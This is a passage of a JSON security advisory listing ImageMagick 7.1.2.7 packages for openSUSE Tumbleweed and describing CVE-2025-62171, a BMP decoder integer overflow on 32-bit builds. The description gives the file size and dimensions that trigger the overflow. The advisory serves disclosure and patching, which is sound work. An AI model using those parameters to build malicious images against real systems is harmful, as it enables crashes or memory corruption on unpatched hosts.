"name": "libMagick++-7_Q16HDRI5-7.1.2.7-1.1.x86_64",
"product": {
"name": "libMagick++-7_Q16HDRI5-7.1.2.7-1.1.x86_64",
"product_id": "libMagick++-7_Q16HDRI5-7.1.2.7-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.x86_64",
"product": {
"name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.x86_64",
"product_id": "libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-7.1.2.7-1.1.x86_64",
"product": {
"name": "libMagick++-devel-7.1.2.7-1.1.x86_64",
"product_id": "libMagick++-devel-7.1.2.7-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-32bit-7.1.2.7-1.1.x86_64",
"product": {
"name": "libMagick++-devel-32bit-7.1.2.7-1.1.x86_64",
"product_id": "libMagick++-devel-32bit-7.1.2.7-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.x86_64",
"product": {
"name": "libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.x86_64",
"product_id": "libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.x86_64",
"product": {
"name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.x86_64",
"product_id": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.x86_64",
"product": {
"name": "libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.x86_64",
"product_id": "libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.x86_64",
"product": {
"name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.x86_64",
"product_id": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "perl-PerlMagick-7.1.2.7-1.1.x86_64",
"product": {
"name": "perl-PerlMagick-7.1.2.7-1.1.x86_64",
"product_id": "perl-PerlMagick-7.1.2.7-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.1.2.7-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-7.1.2.7-1.1.aarch64"
},
"product_reference": "ImageMagick-7.1.2.7-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.1.2.7-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-7.1.2.7-1.1.ppc64le"
},
"product_reference": "ImageMagick-7.1.2.7-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.1.2.7-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-7.1.2.7-1.1.s390x"
},
"product_reference": "ImageMagick-7.1.2.7-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.1.2.7-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-7.1.2.7-1.1.x86_64"
},
"product_reference": "ImageMagick-7.1.2.7-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.1.2.7-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.7-1.1.aarch64"
},
"product_reference": "ImageMagick-config-7-SUSE-7.1.2.7-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.1.2.7-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.7-1.1.ppc64le"
},
"product_reference": "ImageMagick-config-7-SUSE-7.1.2.7-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.1.2.7-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.7-1.1.s390x"
},
"product_reference": "ImageMagick-config-7-SUSE-7.1.2.7-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.1.2.7-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.7-1.1.x86_64"
},
"product_reference": "ImageMagick-config-7-SUSE-7.1.2.7-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.1.2.7-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-devel-7.1.2.7-1.1.aarch64"
},
"product_reference": "ImageMagick-devel-7.1.2.7-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.1.2.7-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-devel-7.1.2.7-1.1.ppc64le"
},
"product_reference": "ImageMagick-devel-7.1.2.7-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.1.2.7-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-devel-7.1.2.7-1.1.s390x"
},
"product_reference": "ImageMagick-devel-7.1.2.7-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.1.2.7-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-devel-7.1.2.7-1.1.x86_64"
},
"product_reference": "ImageMagick-devel-7.1.2.7-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-32bit-7.1.2.7-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.7-1.1.aarch64"
},
"product_reference": "ImageMagick-devel-32bit-7.1.2.7-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-32bit-7.1.2.7-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.7-1.1.ppc64le"
},
"product_reference": "ImageMagick-devel-32bit-7.1.2.7-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-32bit-7.1.2.7-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.7-1.1.s390x"
},
"product_reference": "ImageMagick-devel-32bit-7.1.2.7-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-32bit-7.1.2.7-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.7-1.1.x86_64"
},
"product_reference": "ImageMagick-devel-32bit-7.1.2.7-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-doc-7.1.2.7-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-doc-7.1.2.7-1.1.aarch64"
},
"product_reference": "ImageMagick-doc-7.1.2.7-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-doc-7.1.2.7-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-doc-7.1.2.7-1.1.ppc64le"
},
"product_reference": "ImageMagick-doc-7.1.2.7-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-doc-7.1.2.7-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-doc-7.1.2.7-1.1.s390x"
},
"product_reference": "ImageMagick-doc-7.1.2.7-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-doc-7.1.2.7-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-doc-7.1.2.7-1.1.x86_64"
},
"product_reference": "ImageMagick-doc-7.1.2.7-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-extra-7.1.2.7-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-extra-7.1.2.7-1.1.aarch64"
},
"product_reference": "ImageMagick-extra-7.1.2.7-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-extra-7.1.2.7-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-extra-7.1.2.7-1.1.ppc64le"
},
"product_reference": "ImageMagick-extra-7.1.2.7-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-extra-7.1.2.7-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-extra-7.1.2.7-1.1.s390x"
},
"product_reference": "ImageMagick-extra-7.1.2.7-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-extra-7.1.2.7-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:ImageMagick-extra-7.1.2.7-1.1.x86_64"
},
"product_reference": "ImageMagick-extra-7.1.2.7-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-7.1.2.7-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.7-1.1.aarch64"
},
"product_reference": "libMagick++-7_Q16HDRI5-7.1.2.7-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-7.1.2.7-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.7-1.1.ppc64le"
},
"product_reference": "libMagick++-7_Q16HDRI5-7.1.2.7-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-7.1.2.7-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.7-1.1.s390x"
},
"product_reference": "libMagick++-7_Q16HDRI5-7.1.2.7-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-7.1.2.7-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.7-1.1.x86_64"
},
"product_reference": "libMagick++-7_Q16HDRI5-7.1.2.7-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.aarch64"
},
"product_reference": "libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.ppc64le"
},
"product_reference": "libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.s390x"
},
"product_reference": "libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.x86_64"
},
"product_reference": "libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.1.2.7-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagick++-devel-7.1.2.7-1.1.aarch64"
},
"product_reference": "libMagick++-devel-7.1.2.7-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.1.2.7-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagick++-devel-7.1.2.7-1.1.ppc64le"
},
"product_reference": "libMagick++-devel-7.1.2.7-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.1.2.7-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagick++-devel-7.1.2.7-1.1.s390x"
},
"product_reference": "libMagick++-devel-7.1.2.7-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.1.2.7-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagick++-devel-7.1.2.7-1.1.x86_64"
},
"product_reference": "libMagick++-devel-7.1.2.7-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-32bit-7.1.2.7-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.7-1.1.aarch64"
},
"product_reference": "libMagick++-devel-32bit-7.1.2.7-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-32bit-7.1.2.7-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.7-1.1.ppc64le"
},
"product_reference": "libMagick++-devel-32bit-7.1.2.7-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-32bit-7.1.2.7-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.7-1.1.s390x"
},
"product_reference": "libMagick++-devel-32bit-7.1.2.7-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-32bit-7.1.2.7-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.7-1.1.x86_64"
},
"product_reference": "libMagick++-devel-32bit-7.1.2.7-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.aarch64"
},
"product_reference": "libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.ppc64le"
},
"product_reference": "libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.s390x"
},
"product_reference": "libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.x86_64"
},
"product_reference": "libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.aarch64"
},
"product_reference": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.ppc64le"
},
"product_reference": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.s390x"
},
"product_reference": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.x86_64"
},
"product_reference": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.aarch64"
},
"product_reference": "libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.ppc64le"
},
"product_reference": "libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.s390x"
},
"product_reference": "libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.x86_64"
},
"product_reference": "libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.aarch64"
},
"product_reference": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.ppc64le"
},
"product_reference": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.s390x"
},
"product_reference": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.x86_64"
},
"product_reference": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.1.2.7-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:perl-PerlMagick-7.1.2.7-1.1.aarch64"
},
"product_reference": "perl-PerlMagick-7.1.2.7-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.1.2.7-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:perl-PerlMagick-7.1.2.7-1.1.ppc64le"
},
"product_reference": "perl-PerlMagick-7.1.2.7-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.1.2.7-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:perl-PerlMagick-7.1.2.7-1.1.s390x"
},
"product_reference": "perl-PerlMagick-7.1.2.7-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.1.2.7-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:perl-PerlMagick-7.1.2.7-1.1.x86_64"
},
"product_reference": "perl-PerlMagick-7.1.2.7-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-62171",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-62171"
}
],
"notes": [
{
"category": "general",
"text": "ImageMagick is an open source software suite for displaying, converting, and editing raster image files. In ImageMagick versions prior to 7.1.2-7 and 6.9.13-32, an integer overflow vulnerability exists in the BMP decoder on 32-bit systems. The vulnerability occurs in coders/bmp.c when calculating the extent value by multiplying image columns by bits per pixel. On 32-bit systems with size_t of 4 bytes, a malicious BMP file with specific dimensions can cause this multiplication to overflow and wrap to zero. The overflow check added to address CVE-2025-57803 is placed after the overflow occurs, making it ineffective. A specially crafted 58-byte BMP file with width set to 536,870,912 and 32 bits per pixel can trigger this overflow, causing the bytes_per_line calculation to become zero. This vulnerability only affects 32-bit builds of ImageMagick where default resource limits for width, height, and area have been manually increased beyond their defaults. 64-bit systems with size_t of 8 bytes are not vulnerable, and systems using default ImageMagick resource limits are not vulnerable. The vulnerability is fixed in versions 7.1.2-7 and 6.9.13-32.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:ImageMagick-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:ImageMagick-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.aarch64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.s390x",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.x86_64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.7-1.1.aarch64",
